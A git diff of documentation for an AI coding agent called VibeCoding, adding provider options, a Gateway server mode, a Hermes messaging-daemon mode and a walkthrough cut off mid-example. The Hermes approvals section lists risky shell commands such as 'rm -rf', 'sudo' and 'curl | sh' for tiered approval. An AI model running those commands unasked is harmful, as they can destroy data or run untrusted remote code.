+See [A2A Protocol](a2a.md) documentation for details.
+
 ## Usage Examples
 
 ### Basic Usage
diff --git a/docs/en/configuration.md b/docs/en/configuration.md
index d332cde..30eae33 100644
--- a/docs/en/configuration.md
+++ b/docs/en/configuration.md
@@ -6,8 +6,7 @@ VibeCoding uses two configuration files:
 
 | File | Platform | Scope | Priority |
 |------|----------|-------|----------|
-| `~/.vibecoding/settings.json` | Linux | Global (all projects) | Low |
-| `~/Library/Application Support/vibecoding/settings.json` | macOS | Global (all projects) | Low |
+| `~/.vibecoding/settings.json` | Linux/macOS | Global (all projects) | Low |
 | `%APPDATA%\vibecoding\settings.json` | Windows | Global (all projects) | Low |
 | `.vibe/settings.json` | All | Project-level | High |
 
@@ -143,6 +142,7 @@ Project-level configuration overrides global configuration. When both exist, sca
 | `theme` | string | `"dark"` | UI theme: `"dark"` or `"light"` |
 | `retry` | object | *(see below)* | API call retry settings |
 | `approval` | object | *(see below)* | Bash command approval settings |
+| `webSearch` | object | *(see below)* | Hosted web search settings |
 
 ---
 
@@ -157,7 +157,8 @@ Multi-provider configuration. Each provider is an object keyed by a user-chosen
 | `baseUrl` | string | ✓ | — | API base URL |
 | `vendor` | string | — | auto-detect | Optional vendor adapter name (see below) |
 | `apiKey` | string | — | `""` | API key (see [Authentication](#authentication-configuration) below) |
-| `api` | string | — | auto-detect | API protocol: `"openai-chat"` or `"anthropic-messages"` |
+| `api` | string | — | auto-detect | API protocol: `"openai-chat"`, `"openai-responses"`, `"anthropic-messages"`, `"google-gemini"`, or `"google-vertex"` |
+| `httpProxy` | string | — | `""` | Optional per-provider HTTP proxy URL, e.g. `"http://127.0.0.1:7890"` |
 | `thinkingFormat` | string | — | auto-detect | Thinking parameter format (see below) |
 | `cacheControl` | bool | — | `false` | Enable Anthropic prompt caching; set `true` when using Claude models |
 | `models` | array | — | `[]` | List of available models |
@@ -170,9 +171,9 @@ Selection order:
 
 1. Explicit `vendor`
 2. Base URL detection
-3. Generic fallback: `openai-chat` or `anthropic-messages`
+3. Generic fallback: `openai-chat`, `openai-responses`, `anthropic-messages`, `google-gemini`, or `google-vertex`
 
-Built-in vendor adapters include `openai`, `anthropic`, `claude`, `deepseek`, `xiaomi`, `xiaomi-token-plan-ams`, `xiaomi-token-plan-cn`, `xiaomi-token-plan-sgp`, `kimi`, `minimax`, `seed`, `qianfan`, `bailian`, `gitee`, `openrouter`, `together`, `groq`, and `fireworks`.
+Built-in vendor adapters include `openai`, `anthropic`, `claude`, `deepseek`, `google-gemini`, `google-vertex`, `xiaomi`, `xiaomi-token-plan-ams`, `xiaomi-token-plan-cn`, `xiaomi-token-plan-sgp`, `kimi`, `minimax`, `seed`, `qianfan`, `bailian`, `gitee`, `openrouter`, `together`, `groq`, and `fireworks`.
 
 ```json
 {
@@ -190,19 +191,75 @@ Built-in vendor adapters include `openai`, `anthropic`, `claude`, `deepseek`, `x
 }
 ```
 
+### webSearch
+
+Hosted web search settings. This is disabled by default.
+
+| Field | Type | Required | Default | Description |
+|-------|------|----------|---------|-------------|
+| `enabled` | bool | — | `false` | Enable hosted web search registration |
+| `provider` | string | — | `defaultProvider` | Provider configuration name to use for hosted web search |
+| `providerType` | string | — | auto | Hosted tool type, usually `responses` or `messages` |
+| `model` | string | — | `""` | Optional metadata for routing, display, or future provider-specific handling |
+
+```json
+{
+  "webSearch": {
+    "enabled": true,
+    "provider": "gpt",
+    "providerType": "responses",
+    "model": "gpt-5.4"
+  }
+}
+```
+
+When `provider` points to a configured provider name, VibeCoding resolves that provider's `baseUrl`, `api`, and vendor behavior before registering the hosted search tool.
+
 #### api field
 
 The `api` field specifies the **protocol format**, not the service provider. You can point any provider to any compatible endpoint:
 
 - `openai-chat`: OpenAI Chat Completions API format
+- `openai-responses`: OpenAI Responses API format (`POST /v1/responses`)
 - `anthropic-messages`: Anthropic Messages API format
+- `google-gemini`: Native Gemini API `streamGenerateContent` format
+- `google-vertex`: Native Vertex AI Gemini `streamGenerateContent` format
 
 For example, DeepSeek offers both formats at different endpoints, and you can also use these formats to connect to the actual OpenAI or Anthropic services.
 
 If not specified, auto-detected based on `baseUrl`:
+- Contains `generativelanguage.googleapis.com` → `google-gemini`
+- Contains `aiplatform.googleapis.com` → `google-vertex`
 - Contains "anthropic" → `anthropic-messages`
 - Others → `openai-chat`
 
+Google native providers can be configured directly:
+
+```json
+{
+  "providers": {
+    "google-gemini": {
+      "baseUrl": "https://generativelanguage.googleapis.com/v1beta/models",
+      "apiKey": "${GOOGLE_API_KEY}",
+      "api": "google-gemini",
+      "models": [
+        { "id": "gemini-2.5-flash", "name": "Gemini 2.5 Flash", "reasoning": true, "contextWindow": 1000000, "maxTokens": 65536 }
+      ]
+    },
+    "google-vertex": {
+      "baseUrl": "https://aiplatform.googleapis.com/v1/projects/YOUR_PROJECT/locations/global/publishers/google/models",
+      "apiKey": "!gcloud auth print-access-token",
+      "api": "google-vertex",
+      "models": [
+        { "id": "gemini-2.5-flash", "name": "Gemini 2.5 Flash", "reasoning": true, "contextWindow": 1000000, "maxTokens": 65536 }
+      ]
+    }
+  }
+}
+```
+
+The `!gcloud auth print-access-token` example uses shell command resolution. Set `VIBECODING_ALLOW_SHELL_CONFIG=1` before using `!command` values, or replace it with an environment-variable reference such as `${GOOGLE_VERTEX_TOKEN}`.
+
 #### thinkingFormat field
 
 Specifies how thinking/reasoning parameters are sent to the API:
@@ -440,8 +497,7 @@ Path to the global skills directory. Supports `~` expansion.
 
 | Platform | Default |
 |----------|---------|
-| Linux | `~/.vibecoding/skills` |
-| macOS | `~/Library/Application Support/vibecoding/skills` |
+| Linux/macOS | `~/.vibecoding/skills` |
 | Windows | `%APPDATA%\vibecoding\skills` |
 
 ```json
@@ -577,8 +633,7 @@ Directory for storing session files (JSONL format). Supports `~` expansion.
 
 | Platform | Default |
 |----------|---------|
-| Linux | `~/.vibecoding/sessions` |
-| macOS | `~/Library/Application Support/vibecoding/sessions` |
+| Linux/macOS | `~/.vibecoding/sessions` |
 | Windows | `%APPDATA%\vibecoding\sessions` |
 
 ```json
@@ -774,7 +829,7 @@ MCP servers are configured in standalone `mcp.json` files, not in `settings.json
 
 VibeCoding loads MCP configuration at startup from:
 
-1. Global config: `~/.vibecoding/mcp.json` on Linux, `~/Library/Application Support/vibecoding/mcp.json` on macOS, or `%APPDATA%\vibecoding\mcp.json` on Windows
+1. Global config: `~/.vibecoding/mcp.json` on Linux/macOS, or `%APPDATA%\vibecoding\mcp.json` on Windows
 2. Project config: `.vibe/mcp.json`
 
 Create a template from the TUI:
@@ -841,7 +896,7 @@ The `apiKey` field in a provider config supports three formats:
 | Format | Example | Behavior |
 |--------|---------|----------|
 | `${VAR}` | `"${DEEPSEEK_API_KEY}"` | Reads the value of environment variable `VAR` |
-| `!command` | `"!pass show deepseek-key"` | Executes a shell command and uses its stdout |
+| `!command` | `"!pass show deepseek-key"` | Executes a shell command and uses its stdout only when `VIBECODING_ALLOW_SHELL_CONFIG=1` |
 | Plain string | `"sk-abc123..."` | Used as-is (⚠️ not recommended for shared configs) |
 
 #### Environment Variable Reference
@@ -866,6 +921,12 @@ export DEEPSEEK_API_KEY=sk-...
 
 Prefix with `!` to run a shell command. VibeCoding uses `sh -c` on Linux/macOS and `powershell.exe` on Windows.
 
+Shell command resolution is disabled by default. To enable it for trusted local configuration, set:
+
+```bash
+export VIBECODING_ALLOW_SHELL_CONFIG=1
+```
+
 ```json
 {
   "providers": {
@@ -1000,7 +1061,9 @@ Switch between providers at runtime using `/provider` or `--provider`:
 }
 ```
 
-### Custom API Endpoint / Proxy
+### Custom API Endpoint / HTTP Proxy
+
+`baseUrl` points to an API endpoint or API gateway. `httpProxy` configures the network proxy used only by that provider's HTTP client. When `httpProxy` is empty, the provider keeps Go's default `HTTP_PROXY` / `HTTPS_PROXY` environment behavior.
 
 ```json
 {
@@ -1009,6 +1072,7 @@ Switch between providers at runtime using `/provider` or `--provider`:
       "baseUrl": "https://my-proxy.example.com/v1",
       "api": "openai-chat",
       "apiKey": "${MY_PROXY_API_KEY}",
+      "httpProxy": "http://127.0.0.1:7890",
       "models": [
         {
           "id": "gpt-4o",
diff --git a/docs/en/faq.md b/docs/en/faq.md
index f1b45b2..e7efd0f 100644
--- a/docs/en/faq.md
+++ b/docs/en/faq.md
@@ -12,7 +12,7 @@ A:
 - DeepSeek (default): deepseek-v4-flash, deepseek-v4-pro (1M context, up to 384K output)
 - OpenAI: GPT-4o, o1, etc.
 - Anthropic: Claude Sonnet, Opus, etc.
-- Vendor adapters: Xiaomi, Kimi, MiniMax, Seed, Qianfan, Bailian, Gitee, OpenRouter, Together, Groq, Fireworks, and more
+- Vendor adapters: Google Gemini, Google Vertex, Xiaomi, Kimi, MiniMax, Seed, Qianfan, Bailian, Gitee, OpenRouter, Together, Groq, Fireworks, and more
 - Custom: Any OpenAI Chat or Anthropic Messages compatible API endpoint through generic fallback
 
 ### Q: How to install?
diff --git a/docs/en/gateway.md b/docs/en/gateway.md
new file mode 100644
index 0000000..74ac665
--- /dev/null
+++ b/docs/en/gateway.md
@@ -0,0 +1,339 @@
+# Gateway Mode
+
+## Overview
+
+Gateway mode runs VibeCoding as an HTTP server that exposes a **standard OpenAI Chat Completions API**. Any OpenAI-compatible client — Cursor, Continue, Open WebUI, Python SDK, custom scripts — can connect directly, with the VibeCoding agent loop handling tool execution transparently behind the scenes.
+
+```bash
+vibecoding gateway
+```
+
+## Quick Start
+
+```bash
+# Generate config template
+vibecoding --init-gateway
+
+# Start the gateway (default :8080)
+vibecoding gateway
+
+# Test it
+curl http://localhost:8080/v1/chat/completions \
+  -H "Content-Type: application/json" \
+  -d '{
+    "model": "deepseek-v4-flash",
+    "messages": [{"role": "user", "content": "list files in current directory"}],
+    "stream": false
+  }'
+```
+
+## CLI Flags
+
+| Flag | Description |
+|------|-------------|
+| `--port` | Listen port (default: from config or 8080) |
+| `--config` | Path to gateway.json |
+| `--work-dir` | Default working directory |
+| `--provider` / `-p` | Override provider |
+| `--model` / `-m` | Override model |
+| `--sandbox` | Enable sandbox (bwrap) |
+| `--multi-agent` | Enable sub-agent tools |
+| `--verbose` | Verbose output |
+| `--debug` | Debug logging |
+
+## Configuration
+
+Gateway uses its own config file `gateway.json`, separate from `settings.json`.
+
+**Config locations** (highest priority first):
+
+1. CLI `--config /path/to/gateway.json`
+2. `.vibe/gateway.json` (project-level)
+3. `~/.vibecoding/gateway.json` (global)
+
+Generate a template with:
+
+```bash
+vibecoding --init-gateway
+vibecoding --init-gateway --force  # overwrite existing
+```
+
+### Full Config Reference
+
+```jsonc
+{
+  "listen": ":8080",
+
+  "auth": {
+    "enabled": false,
+    "tokens": ["sk-your-secret-token"]
+  },
+
+  "defaultMode": "yolo",
+  "defaultThinkingLevel": "medium",
+  "enableSubAgents": false,
+
+  "sandbox": {
+    "enabled": false,
+    "level": ""       // "none", "standard", "strict"; empty = auto from mode
+  },
+
+  "workingDir": "/home/user/projects",
+
+  "allowedWorkDirs": [
+    "/home/user/projects",
+    "/opt/repos"
+  ],
+
+  "session": {
+    "idleTimeoutSeconds": 1800,
+    "maxSessions": 0
+  },
+
+  "toolVisibility": {
+    "mode": "content",      // "content", "sse_event", "none"
+    "detail": "collapsed"   // "collapsed", "expanded"
+  },
+
+  "systemPromptMode": "append",   // "append", "ignore"
+  "requestTimeoutSeconds": 1800,
+  "maxConcurrentRequests": 0,
+
+  "cors": {
+    "enabled": false,
+    "allowOrigins": ["*"]
+  },
+
+  "provider": "",
+  "model": "",
+  "logLevel": "info"
+}
+```
+
+If Gateway is configured to listen beyond loopback, runs in `yolo` mode, and authentication is disabled, startup prints a warning. For exposed deployments, enable `auth.enabled`, restrict `allowedWorkDirs`, and consider enabling the sandbox.
+
+## API Endpoints
+
+### POST /v1/chat/completions
+
+Standard OpenAI Chat Completions API. Supports streaming and non-streaming.
+
+**Request:**
+
+```json
+{
+  "model": "deepseek-v4-flash",
+  "messages": [
+    {"role": "system", "content": "You are a helpful assistant."},
+    {"role": "user", "content": "Read main.go and explain it."}
+  ],
+  "stream": true,
+  "max_tokens": 4096,
+  "x_session_id": "my-session",
+  "x_mode": "yolo",
+  "x_working_dir": "/home/user/project"
+}
+```
+
+Extension fields (`x_*`) are optional:
+
+| Field | Description |
+|-------|-------------|
+| `x_session_id` | Associate with an existing session (omit for new) |
+| `x_mode` | Override mode for this request |
+| `x_working_dir` | Override working directory (must pass `allowedWorkDirs`) |
+
+**Non-streaming response:**
+
+```json
+{
+  "id": "chatcmpl-xxx",
+  "object": "chat.completion",
+  "created": 1716883200,
+  "model": "deepseek-v4-flash",
+  "choices": [{
+    "index": 0,
+    "message": {"role": "assistant", "content": "Here is the explanation..."},
+    "finish_reason": "stop"
+  }],
+  "usage": {"prompt_tokens": 100, "completion_tokens": 200, "total_tokens": 300},
+  "x_session_id": "my-session",
+  "x_tool_calls": [
+    {"name": "read", "args": {"path": "main.go"}, "status": "completed"}
+  ]
+}
+```
+
+**Streaming response** uses standard SSE format with `data:` lines and `[DONE]` sentinel.
+
+### GET /v1/models
+
+Returns available models.
+
+### GET /health
+
+Health check (no auth required).
+
+```json
+{"status": "ok", "version": "v0.1.26", "sessions": 3}
+```
+
+## Slash Commands
+
+When the last user message starts with `/`, it is processed as a command at the gateway layer — no LLM is called.
+
+| Command | Description |
+|---------|-------------|
+| `/clear` | Clear session context |
+| `/mode [plan\|agent\|yolo]` | Show or switch mode |
+| `/model [model_id]` | Show or switch model |
+| `/models` | List available models |
+| `/sessions` | List active sessions |
+| `/sessions del <id>` | Delete a session |
+| `/compact` | Trigger context compaction |
+| `/status` | Show session status |
+| `/skill <name>` | Activate a skill |
+| `/skills` | List available skills |
+| `/help` | Show all commands |
+
+Commands return standard OpenAI response format. Works in both `stream: true` and `stream: false`.
+
+## Tool Visibility
+
+Controls how tool execution appears in the response content.
+
+### Mode
+
+| `toolVisibility.mode` | Behavior |
+|------------------------|----------|
+| `content` (default) | Tool output mixed into content stream |
+| `sse_event` | Tool output via separate `event: tool_status` SSE events |
+| `none` | No tool output, client sees only final text |
+
+### Detail
+
+| `toolVisibility.detail` | Behavior |
+|--------------------------|----------|
+| `collapsed` (default) | One-line summary: `🔧 read: main.go ✅` |
+| `expanded` | Full output in code fences with language detection |
+
+**Collapsed mode** (default): most tools show a one-line summary. `edit`/`write` with diffs always show the diff. Errors always show in full.
+
+**Expanded mode**: tool results wrapped in fenced code blocks with auto-detected language (`.go` → `go`, `.py` → `python`, bash output → `bash`, diffs → `diff`).
+
+## Multi-Session
+
+Each request can be associated with a session via `x_session_id`. Sessions maintain independent agent state, message history, and tools.
+
+- No `x_session_id` → new session per request (stateless)
+- With `x_session_id` → multi-turn conversation (stateful)
+- Sessions auto-expire after `idleTimeoutSeconds`
+- Requests within the same session are serialized
+
+## Authentication
+
+Set `auth.enabled: true` and configure `auth.tokens`:
+
+```json
+{
+  "auth": {
+    "enabled": true,
+    "tokens": ["sk-token-1", "sk-token-2"]
+  }
+}
+```
+
+Clients send: `Authorization: Bearer sk-token-1`
+
+The `/health` endpoint is always unauthenticated.
+
+## CORS
+
+When CORS is enabled, Gateway returns a single `Access-Control-Allow-Origin` value:
+
+- `allowOrigins: ["*"]` allows any origin
+- otherwise, the request `Origin` must exactly match one configured origin
+- if there is no `Origin` header and exactly one origin is configured, that origin is returned
+
+## Security
+
+Three independent layers:
+
+| Layer | Mechanism | Purpose |
+|-------|-----------|---------|
+| L1 | Bearer Token | Block unauthorized access |
+| L2 | `allowedWorkDirs` | Restrict file system scope |
+| L3 | Sandbox (bwrap) | OS-level isolation |
+
+### allowedWorkDirs
+
+Controls which directories `x_working_dir` can switch to:
+
+- Not set (`null`) → no restriction
+- Empty `[]` → deny all overrides, only `workingDir` allowed
+- List of paths → path-aware match with separator boundaries
+
+`workingDir` itself is always trusted (admin-configured).
+
+## Client Examples
+
+### Python OpenAI SDK
+
+```python
+from openai import OpenAI
+
+client = OpenAI(
+    base_url="http://localhost:8080/v1",
+    api_key="sk-my-token",  # if auth enabled
+)
+
+response = client.chat.completions.create(
+    model="deepseek-v4-flash",
+    messages=[
+        {"role": "user", "content": "Read main.go and explain it."},
+    ],
+    stream=True,
+)
+
+for chunk in response:
+    if chunk.choices[0].delta.content:
+        print(chunk.choices[0].delta.content, end="")
+```
+
+### Multi-turn with Session
+
+```python
+response = client.chat.completions.create(
+    model="deepseek-v4-flash",
+    messages=[{"role": "user", "content": "read main.go"}],
+    extra_body={"x_session_id": "my-session"},
+)
+
+response = client.chat.completions.create(
+    model="deepseek-v4-flash",
+    messages=[{"role": "user", "content": "now refactor the error handling"}],
+    extra_body={"x_session_id": "my-session"},
+)
+```
+
+### curl
+
+```bash
+curl http://localhost:8080/v1/chat/completions \
+  -H "Content-Type: application/json" \
+  -H "Authorization: Bearer sk-my-token" \
+  -d '{
+    "model": "deepseek-v4-flash",
+    "messages": [{"role": "user", "content": "explain main.go"}],
+    "stream": true
+  }'
+```
+
+## System Prompt Handling
+
+| `systemPromptMode` | Behavior |
+|---------------------|----------|
+| `append` (default) | Client system messages appended to built-in system prompt |
+| `ignore` | Client system messages discarded |
+
+The built-in system prompt includes tool definitions, mode instructions, and context files. `append` mode preserves all of this while adding client customizations.
diff --git a/docs/en/getting-started.md b/docs/en/getting-started.md
index 38a7b7b..ebee3e3 100644
--- a/docs/en/getting-started.md
+++ b/docs/en/getting-started.md
@@ -144,6 +144,18 @@ vibecoding acp --multi-agent
 
 Multi-agent mode registers `subagent_*` tools for delegated work. Cron command entry points are available in TUI multi-agent workflows.
 
+### A2A Master Mode
+
+```bash
+# Generate sample config
+vibecoding --init-a2a-master-config
+
+# Enable master mode
+vibecoding --enable-a2a-master
+```
+
+A2A Master mode lets you manage multiple remote A2A agents, with the LLM automatically dispatching tasks via the `a2a_dispatch` tool. See [A2A Protocol](a2a.md) for details.
+
 ## Choose Mode
 
 VibeCoding provides three modes:
@@ -271,3 +283,4 @@ See the [ACP Protocol](acp.md) documentation for details.
 - Understand the [Security Model](security.md) to protect your system
 - Explore the [Skills System](skills.md) to create reusable prompt snippets
 - Set up [IDE Integration](acp.md) with VS Code or JetBrains
+- Check out [Scenarios & Walkthroughs](scenarios.md) for practical usage examples
diff --git a/docs/en/hermes.md b/docs/en/hermes.md
new file mode 100644
index 0000000..a3d67b9
--- /dev/null
+++ b/docs/en/hermes.md
@@ -0,0 +1,443 @@
+# Hermes Mode
+
+## Overview
+
+Hermes mode runs VibeCoding as a **messaging gateway daemon** with WebSocket/HTTP API, WeChat, Feishu, and A2A protocol support. It transforms VibeCoding from a coding assistant into a deployable autonomous agent.
+
+```bash
+vibecoding hermes start
+```
+
+## Quick Start
+
+```bash
+# Generate config template
+vibecoding hermes config init
+
+# Start hermes (foreground)
+vibecoding hermes start
+
+# Start hermes (background)
+vibecoding hermes start -d
+
+# Check status
+vibecoding hermes status
+
+# Stop hermes
+vibecoding hermes stop
+
+# Connect as client
+vibecoding hermes client
+```
+
+## Architecture
+
+```
+                    ┌─────────────────────────────────────┐
+                    │         Hermes Gateway (:8090)       │
+                    │                                     │
+                    │  ┌─────────┐  ┌─────────┐  ┌─────┐ │
+   WeChat ─────────►│  │Messaging│  │  HTTP   │  │ A2A │ │
+   Feishu ─────────►│  │Platform │  │  REST   │  │     │ │
+                    │  └────┬────┘  └────┬────┘  └──┬──┘ │
+                    │       │            │          │     │
+                    │       └──────┬─────┘──────────┘     │
+                    │              ▼                       │
+                    │       ┌──────────┐                  │
+                    │       │Dispatcher│                  │
+                    │       └────┬─────┘                  │
+                    │            ▼                        │
+                    │  ┌──────────────────┐               │
+                    │  │   Agent Loop     │               │
+                    │  │  (per-user)      │               │
+                    │  └──────────────────┘               │
+                    └─────────────────────────────────────┘
+```
+
+## CLI Commands
+
+### `hermes start`
+
+Start the Hermes daemon.
+
+| Flag | Description |
+|------|-------------|
+| `-d` | Run in background |
+| `--port` | Listen port (default: from config or 8090) |
+| `--work-dir` | Default working directory |
+| `-p`, `--provider` | Override default provider |
+| `-m`, `--model` | Override default model |
+| `--multi-agent` | Enable sub-agent tools |
+| `--sandbox` | Enable bwrap sandbox |
+| `--config` | Path to hermes.json |
+| `--verbose` | Verbose output |
+| `--debug` | Debug logging |
+
+### `hermes stop`
+
+Stop the running Hermes daemon via PID file + SIGTERM.
+
+### `hermes status`
+
+Check Hermes daemon status (PID check + HTTP health query).
+
+### `hermes client`
+
+Connect to a running Hermes instance via WebSocket.
+
+| Flag | Description |
+|------|-------------|
+| `--url` | WebSocket URL (default: `ws://localhost:8090/ws`) |
+| `--session` | Session ID to resume |
+
+**Client Commands:**
+- `/help` — Show help
+- `/new` — Start a new session
+- `/clear` — Clear current session
+- `/status` — Show session status
+- `/sessions` — List active sessions
+- `/mode <mode>` — Set mode (plan/agent/yolo)
+- `/compact` — Trigger compaction
+- `/quit` — Exit
+
+### `hermes config`
+
+Manage Hermes configuration.
+
+```bash
+vibecoding hermes config init              # Create global config template
+vibecoding hermes config init --project    # Create project config template
+vibecoding hermes config show              # Show effective config
+```
+
+### `hermes wechat`
+
+Manage WeChat iLink connection.
+
+```bash
+vibecoding hermes wechat login             # QR code login
+vibecoding hermes wechat login --force     # Force re-login
+vibecoding hermes wechat status            # Show connection status
+```
+
+### `hermes feishu`
+
+Manage Feishu (Lark) connection.
+
+```bash
+vibecoding hermes feishu setup             # Show configuration guide
+vibecoding hermes feishu status            # Show connection status
+```
+
+### `hermes webhook`
+
+Manage webhook routes.
+
+```bash
+vibecoding hermes webhook list             # List configured routes
+```
+
+### `hermes memory`
+
+Manage persistent memory.
+
+```bash
+vibecoding hermes memory show              # Show memory.md content
+vibecoding hermes memory clear             # Reset memory.md
+```
+
+### `hermes sessions`
+
+Manage sessions.
+
+```bash
+vibecoding hermes sessions list            # List active sessions (queries running instance)
+```
+
+### `hermes cron`
+
+Manage cron scheduled tasks.
+
+```bash
+vibecoding hermes cron list                # List all cron jobs
+vibecoding hermes cron add <name> <prompt> # Add a cron job
+vibecoding hermes cron remove <id>         # Remove a cron job
+vibecoding hermes cron enable <id>         # Enable a cron job
+vibecoding hermes cron disable <id>        # Disable a cron job
+```
+
+## Configuration
+
+### `hermes.json`
+
+Configuration file for Hermes mode. Supports global + project-level overlay.
+
+**Locations:**
+- Global: `<GLOBAL_DIR>/hermes.json`
+- Project: `.vibe/hermes.json` (overrides global)
+
+```jsonc
+{
+  "server": {
+    "port": 8090,
+    "host": "0.0.0.0",
+    "auth_token": ""
+  },
+  "default_provider": "",
+  "default_model": "",
+  "multi_agent": false,
+  "sandbox": false,
+  "wechat": {
+    "enabled": false,
+    "cred_path": "",
+    "work_dir": "",
+    "allowed_users": [],
+    "auto_typing": true
+  },
+  "feishu": {
+    "enabled": false,
+    "app_id": "",
+    "app_secret": "",
+    "work_dir": "",
+    "allowed_users": []
+  },
+  "webhooks": {
+    "enabled": false,
+    "secret": "",
+    "routes": [
+      {
+        "path": "/github",
+        "events": ["push", "pull_request"],
+        "skill": "code-review",
+        "delivery": "feishu",
+        "delivery_target": "chat_id"
+      }
+    ]
+  },
+  "a2a": {
+    "enabled": false,
+    "port": 8093
+  },
+  "cron": {
+    "enabled": true
+  },
+  "memory": {
+    "enabled": true,
+    "path": ""
+  },
+  "security": {
+    "smart_approvals": true,
+    "allowed_work_dirs": []
+  },
+  "hooks": {
+    "pre_tool_call": "",
+    "post_tool_call": ""
+  },
+  "agent": {
+    "max_turns": 90,
+    "budget_pressure": true,
+    "context_pressure": true,
+    "budget_pressure_threshold": 0.20,
+    "context_pressure_threshold": 0.55
+  },
+  "work_dir": "."
+}
+```
+
+### Configuration Priority
+
+```
+CLI flags > hermes.json (project) > hermes.json (global) > defaults
+```
+
+### Working Directory Priority
+
+```
+Platform work_dir (wechat/feishu) > Global work_dir > CLI --work-dir > cwd
+```
+
+## Messaging Platforms
+
+### WeChat (iLink Protocol)
+
+- Zero external dependencies (Go stdlib only)
+- QR code login, credentials saved to `<GLOBAL_DIR>/wechat-credentials.json`
+- Long-poll message receiving (no public IP needed)
+- Auto-relogin on session expiry
+- Typing indicator support
+
+### Feishu (Lark)
+
+- Official SDK: `github.com/larksuite/oapi-sdk-go/v3`
+- WebSocket long connection (no public IP needed)
+- Text message support
+- Auto-reconnect
+
+## WebSocket API
+
+### Connection
+
+```
+ws://localhost:8090/ws?session=<session_id>
+```
+
+When `server.auth_token` is configured, send the token with an HTTP header during the WebSocket handshake:
+
+```http
+Authorization: Bearer <auth_token>
+```
+
+The legacy `?token=` query parameter is still accepted for compatibility, but the header form avoids exposing tokens in URLs and logs.
+
+### Client → Server Messages
+
+```jsonc
+// Chat message
+{"type": "message", "content": "help me with this code"}
+
+// Slash command
+{"type": "command", "content": "/new"}
+
+// Approval response
+{"type": "approval", "approval_id": "ap_xxx", "approved": true}
+
+// Heartbeat
+{"type": "ping"}
+```
+
+### Server → Client Messages
+
+```jsonc
+// Connection confirmed
+{"type": "connected", "session_id": "...", "version": "..."}
+
+// Streaming text
+{"type": "text_delta", "content": "Let me help..."}
+
+// Thinking
+{"type": "think_delta", "content": "Analyzing..."}
+
+// Tool call
+{"type": "tool_call", "tool": "read", "call_id": "...", "args": {"path": "main.go"}}
+
+// Tool result
+{"type": "tool_result", "tool": "read", "call_id": "...", "result": "..."}
+
+// File diff
+{"type": "tool_diff", "call_id": "...", "path": "main.go", "diff": "..."}
+
+// Approval request (high risk)
+{"type": "approval_request", "approval_id": "ap_xxx", "tool": "bash", "args": {...}}
+
+// Usage stats
+{"type": "usage", "prompt_tokens": 1200, "completion_tokens": 350}
+
+// Turn complete
+{"type": "done", "stop_reason": "end_turn"}
+
+// Status message
+{"type": "status", "message": "Compaction triggered"}
+
+// Command response
+{"type": "command_result", "command": "/new", "message": "✅ New session created."}
+
+// Error
+{"type": "error", "message": "provider error"}
+
+// Heartbeat
+{"type": "pong"}
+```
+
+## HTTP REST API
+
+| Endpoint | Method | Auth | Description |
+|----------|--------|------|-------------|
+| `/api/health` | GET | No | Health check |
+| `/api/status` | GET | Yes | Service status |
+| `/api/sessions` | GET | Yes | List active sessions |
+| `/api/sessions/{id}` | GET | Yes | Session details |
+| `/api/sessions/{id}` | DELETE | Yes | Delete session |
+| `/api/memory` | GET | Yes | Read memory.md |
+| `/api/memory` | PUT | Yes | Update memory.md |
+| `/api/platforms` | GET | Yes | Platform status |
+| `/webhook/*` | POST | Secret | Webhook ingress |
+
+## Smart Approvals
+
+Tiered risk classification for tool calls:
+
+| Risk Level | WebSocket | Messaging Platform |
+|------------|-----------|-------------------|
+| Low | Auto-approve | Auto-approve |
+| Medium | Auto-approve + notify | Auto-approve + notify |
+| High | `approval_request` → wait for response (5min timeout) | Auto-reject + notify |
+
+**Risk Classification:**
+- **Low**: `go`, `make`, `npm`, `git status/log/diff`, `ls`, `cat`, `grep`, `find`
+- **Medium**: `mv`, `cp -r`, `git push`, `docker`, `curl`, `ssh`
+- **High**: `rm -rf`, `sudo`, `shutdown`, `curl | sh`, `eval`, `exec`
+
+## Pressure System
+
+### Context Pressure
+
+Fires `EventContextPressure` when context usage exceeds threshold (default: 55%).
+
+```jsonc
+{
+  "agent": {
+    "context_pressure": true,
+    "context_pressure_threshold": 0.55
+  }
+}
+```
+
+### Budget Pressure
+
+Fires `EventBudgetPressure` when remaining iterations reach threshold (default: 20%).
+
+```jsonc
+{
+  "agent": {
+    "budget_pressure": true,
+    "budget_pressure_threshold": 0.20
+  }
+}
+```
+
+Both are one-shot events: fire once per threshold crossing, not every turn.
+
+## Memory
+
+Persistent memory stored as `memory.md` (Markdown, human-readable).
+
+**Lookup Priority:**
+1. `memory.path` config → explicit path
+2. `.vibe/memory.md` → project memory
+3. `<GLOBAL_DIR>/memory.md` → global memory
+
+**Sections:**
+- `## User Profile` — User preferences
+- `## Working Memory` — Current context
+- `## Lessons Learned` — Accumulated knowledge
+
+**Default:** Writes to `.vibe/memory.md` (project directory).
+
+## Session Management
+
+- Each `platform:user_id` gets one persistent session
+- `/new` archives current session and creates new one
+- Sessions stored in `<sessionDir>/hermes/<platform>/<user_id>/active.jsonl`
+- Auto-compaction when context window is full
+
+## A2A Protocol
+
+See [A2A Documentation](a2a.md) for Agent-to-Agent protocol details.
+
+## Security
+
+- **User Whitelist**: `allowed_users` per platform
+- **Auth Token**: Bearer token for HTTP/WebSocket API
+- **Allowed Work Dirs**: Restrict working directories
+- **Shell Hooks**: Pre/post tool call external scripts
+- **Smart Approvals**: Tiered risk classification
diff --git a/docs/en/scenarios.md b/docs/en/scenarios.md
new file mode 100644
index 0000000..52fdcc0
--- /dev/null
+++ b/docs/en/scenarios.md
@@ -0,0 +1,533 @@
+# Scenarios & Walkthroughs
+
+This document demonstrates VibeCoding's various usage modes through practical scenarios.
+
+---
+
+## Scenario 1: Daily Coding (Single Agent Mode)
+
+The most basic usage — conversing with AI in the terminal for everyday development tasks.
+
+### Setup
+
+```bash
+# Set API key
+export DEEPSEEK_API_KEY=sk-...
+
+# Enter project directory
+cd ~/projects/myapp
+```
+
+### A: Code Explanation
+
+```bash
+$ vibecoding "explain the core logic of internal/agent/agent.go"
+```
+
+VibeCoding will:
+1. Load context files (`AGENTS.md`, `CLAUDE.md`)
+2. Read the file with `read`
+3. Explore related code with `ls`, `grep`
+4. Output a structured explanation
+
+### B: Bug Fix
+
+```bash
+$ vibecoding
+```
+
+```
+> fix the null pointer error in handler.go
+
+[Agent]
+  📄 read("internal/handler.go", offset=45, limit=20)
+  → Found: line 52 doesn't check if err is nil
+
+  📝 edit("internal/handler.go", edits=[
+    {oldText: "resp, _ := client.Do(req)",
+     newText: "resp, err := client.Do(req)\n\tif err != nil {\n\t\treturn nil, err\n\t}"}
+  ])
+  → Edit successful
+
